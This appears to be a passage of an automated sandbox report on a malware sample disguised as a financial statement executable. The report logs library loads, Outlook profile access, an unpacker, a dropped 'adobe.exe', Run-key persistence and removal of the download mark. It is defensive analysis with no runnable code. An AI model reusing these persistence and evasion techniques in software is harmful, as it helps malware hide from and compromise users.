Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, EvenMoreWhimsicalFunctions.cs	.Net Code: Polan System.AppDomain.Load(byte[])
Source: adobe.exe.3.dr, EvenMoreWhimsicalFunctions.cs	.Net Code: Polan System.AppDomain.Load(byte[])

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static PE information: 0xEBF8C820 [Wed Jun 15 04:18:40 2095 UTC]

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 0_2_0098E72A push esp; retf	0_2_0098E731
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 0_2_0098EEDA push eax; iretd	0_2_0098EEE1
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 0_2_04B96CD0 push eax; ret	0_2_04B96CF9
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06AE9F31 pushfd ; iretd	3_2_06AE9F32
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06AEBAB0 push es; ret	3_2_06AEBAC0
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Code function: 3_2_06AE7952 push es; ret	3_2_06AE7960
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_0537E72A push esp; retf	5_2_0537E731
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_0537EEDA push eax; iretd	5_2_0537EEE1
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_05496CD0 push eax; ret	5_2_05496CF9
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D67FE3 push ebp; ret	7_2_06D67FEA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D65741 push 1405C32Fh; ret	7_2_06D65855
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D67CF8 push esi; ret	7_2_06D67FE2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D67CE9 push edx; ret	7_2_06D67CEA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D6E312 push ss; iretd	7_2_06D6E31A
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D641B3 push ss; ret	7_2_06D641BA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06D641B1 push ss; ret	7_2_06D641B2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 9_2_02C047B1 push ebp; ret	9_2_02C04815
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 9_2_02C0E72A push esp; retf	9_2_02C0E731
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 9_2_02C0EEDA push eax; iretd	9_2_02C0EEE1
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 10_2_031E0C55 push edi; retf	10_2_031E0C7A

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Static PE information: section name: .text entropy: 7.447223065937859
Source: adobe.exe.3.dr	Static PE information: section name: .text entropy: 7.447223065937859

Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.4da0000.3.raw.unpack, Form1.cs	High entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.4da0000.3.raw.unpack, QJDLGErGwGLnDsDTGnUfx.cs	High entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, Form1.cs	High entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, QJDLGErGwGLnDsDTGnUfx.cs	High entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, Form1.cs	High entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, QJDLGErGwGLnDsDTGnUfx.cs	High entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

File written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File created: \statement july #u007e sep 2024 usd 19,055.00.exe
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File created: \statement july #u007e sep 2024 usd 19,055.00.exe
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File created: \statement july #u007e sep 2024 usd 19,055.00.exe
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File created: \statement july #u007e sep 2024 usd 19,055.00.exe	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File created: \statement july #u007e sep 2024 usd 19,055.00.exe	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File created: \statement july #u007e sep 2024 usd 19,055.00.exe	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

File created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

File opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
